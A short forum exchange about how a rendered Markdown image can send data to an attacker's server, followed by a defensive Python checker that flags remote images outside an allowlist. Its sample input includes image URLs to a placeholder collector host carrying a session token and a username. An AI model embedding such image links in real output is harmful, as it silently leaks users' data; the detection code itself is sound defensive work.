Comment by oarsinsync
2 days ago
> a markdown file could transmit data when rendered.
This is a new threat vector to me. Can you tell me more?
2 days ago
Not hypothetical: https://checkmarx.com/zero-post/exploiting-markdown-injectio...
Your markdown file has an image that links to another server controlled by the attacker and the path/query parameters you're attempting to render contain sensitive data.
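A defender-side check for the pattern described in the comment above, as an added example that is not part of the thread: it lists every image a Markdown document would make the renderer fetch from a host outside an allowlist, and whether the URL carries a query string. The hostnames and sample document are constructed, and the regexes are an approximation of Markdown image syntax rather than a full parser.

```python
import re
from urllib.parse import urlparse

# Inline image: ![alt](url "optional title")
INLINE_IMG = re.compile(r'!\[[^\]]*\]\(\s*<?([^\s)>]+)')
# Reference-style image use ![alt][ref] and its definition [ref]: url
REF_USE = re.compile(r'!\[[^\]]*\]\[([^\]]+)\]')
REF_DEF = re.compile(r'^\s{0,3}\[([^\]]+)\]:\s*<?([^\s>]+)', re.MULTILINE)
# Raw HTML image, which many Markdown renderers pass through unchanged
HTML_IMG = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)

# Constructed sample document (all hosts are placeholders)
SAMPLE = """\
![logo](images/logo.png)
![chart](https://cdn.docs.example/chart.png)
![x](https://collector.example/p.png?d=SESSION-TOKEN-PLACEHOLDER)
![y][px]
<img src="//collector.example/q.gif?u=alice">

[px]: https://collector.example/r.png
"""


def image_urls(markdown):
    """Yield every image URL the document would ask a renderer to fetch."""
    yield from INLINE_IMG.findall(markdown)
    yield from HTML_IMG.findall(markdown)
    defs = {name.lower(): url for name, url in REF_DEF.findall(markdown)}
    for ref in REF_USE.findall(markdown):
        if ref.lower() in defs:
            yield defs[ref.lower()]


def find_remote_images(markdown, allowed_hosts=frozenset()):
    """Return (url, host, has_query) for images on hosts not allowlisted."""
    findings = []
    for url in image_urls(markdown):
        parts = urlparse(url)
        host = (parts.hostname or "").lower()
        if not host or host in allowed_hosts:
            continue  # relative path or trusted host: no third-party request
        findings.append((url, host, bool(parts.query)))
    return findings
```

A finding without a query string is still a request to a third-party host, and the path alone can carry data, so the allowlist decision matters more than the `has_query` flag.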